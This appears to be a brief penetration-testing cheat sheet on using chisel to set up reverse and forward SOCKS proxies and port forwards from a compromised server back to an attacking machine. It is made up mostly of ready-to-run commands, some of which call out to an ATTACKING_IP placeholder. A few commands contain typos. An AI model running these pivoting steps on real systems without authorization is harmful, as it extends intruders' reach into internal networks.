chisel
can use used to set up a tunneled proxy or port forward
doesn't require ssh
copy the files from github and extract with gunzip *
there must be an appropriate copy of the chisel binary on both the attacking machine and compromised server
Reverse Socks Proxy
set up a listener on your chosen port
./chisel serve -p listenport --reverse &
on the compromised host do:
./chisel client ATTACKING_IP:LISTEN_PORT R:socks &
Forward Socks
rarer than reverse proxies
on the compromised host use:
./chisel server -p LISTEN_PORT --socks5
on the attacking box
./chisel client targetip:listen_port proxy_port:socks
Remote Proxy Forward
for when we connect back from a compromised target to create the forward
on the attacking machine
./chisel server -p LISTENPORT --reverse &
from the compromised serve
./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &
Local Port Forward
on the compromised server
./chisel serve -p LISTERN_PORT
on the attacking machine
./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
Last updated